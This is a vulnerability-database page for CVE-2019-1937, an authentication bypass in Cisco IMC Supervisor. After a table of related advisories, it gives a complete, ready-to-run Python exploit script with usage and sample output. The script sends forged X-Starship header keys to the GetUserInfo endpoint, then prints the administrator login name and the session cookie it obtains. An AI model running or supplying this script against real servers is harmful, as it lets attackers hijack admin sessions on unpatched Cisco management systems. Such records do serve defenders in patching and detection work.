Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass

🗓️ 15 Jul 2023 00:00:00Reported by Fatih SencerType

exploitdb🔗 www.exploit-db.com👁 314 Views

Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass exploit targeting vulnerabilities in Cisco IMC Supervisor less than 2.2.1.0

Reporter	Title	Published	Views	Family All 22
0day.today	Cisco UCS Director, Cisco Integrated Management Controller Supervisor - Multiple Vulnerabilities	29 Aug 201900:00	–	zdt
0day.today	Cisco UCS Director Unauthenticated Remote Code Execution Exploit	2 Sep 201900:00	–	zdt
0day.today	Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass Vulnerability	15 Jul 202300:00	–	zdt
Circl	CVE-2019-1937	2 Sep 201915:56	–	circl
Cisco	Cisco Integrated Management Controller Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data Authentication Bypass Vulnerability	21 Aug 201916:00	–	cisco
Tenable Nessus	Cisco UCS Director Authentication Bypass (cisco-sa-20190821-imcs-ucs-authby)	26 Aug 201900:00	–	nessus
Check Point Advisories	Cisco UCS Director Web Interface Authentication Bypass (CVE-2019-1937)	16 Sep 201900:00	–	checkpoint_advisories
CVE	CVE-2019-1937	21 Aug 201918:25	–	cve
Cvelist	CVE-2019-1937 Cisco Integrated Management Controller Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data Authentication Bypass Vulnerability	21 Aug 201918:25	–	cvelist
Exploit DB	Cisco UCS Director, Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities	21 Aug 201900:00	–	exploitdb

[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass
[+] Cisco IMC Supervisor - < 2.2.1.0
[+] Date: 08/21/2019
[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo
[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html
[+] Vulnerability Discovery : Pedro Ribeiro
[+] Exploit Author: Fatih Sencer
[+] CVE: CVE-2019-1937
----------------------------------------------------

Usage:

./python3 CiscoIMC-Bypass.py -u host

[+] Target https://xxxxxx.com
[+] Target OK
[+] Exploit Succes
[+] Login name : admin
[+] Cookie : REACTED

"""

import argparse,requests,warnings,base64,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter('ignore',InsecureRequestWarning)


def init():
    parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')
    parser.add_argument('-u','--host',help='Host', type=str, required=True)
    args = parser.parse_args()
    exploit(args)

def exploit(args):
    session = requests.Session()
    headers = {
        "User-Agent":                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",
        "X-Requested-With":             "XMLHttpRequest",
        "Referer":                      "https://{}/".format(args.host),
        "X-Starship-UserSession-Key":   ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),
        "X-Starship-Request-Key":   ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
    }
    target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)
    print("[+] Target {}".format(args.host))
    
    exp_send = session.get(target, headers=headers, verify=False, timeout=10)

    if exp_send.status_code == 200:
        print("[+] Target OK")
        body_data = json.loads(exp_send.text)
        if not (body_data.get('loginName') is None):
            print("[+] Exploit Succes")
            print("[+] Login name : {}".format(body_data.get('loginName')))
            print("[+] Cookie : {}".format(session.cookies.get_dict()))
        else:
            print("[-] Exploit Failed")
            
    else:
        print("[-] N/A")
        exit()

if __name__ == "__main__":
    init()

15 Jul 2023 00:00Current

8.3High risk

Vulners AI Score8.3

CVSS 39.8

CVSS 210

EPSS0.90491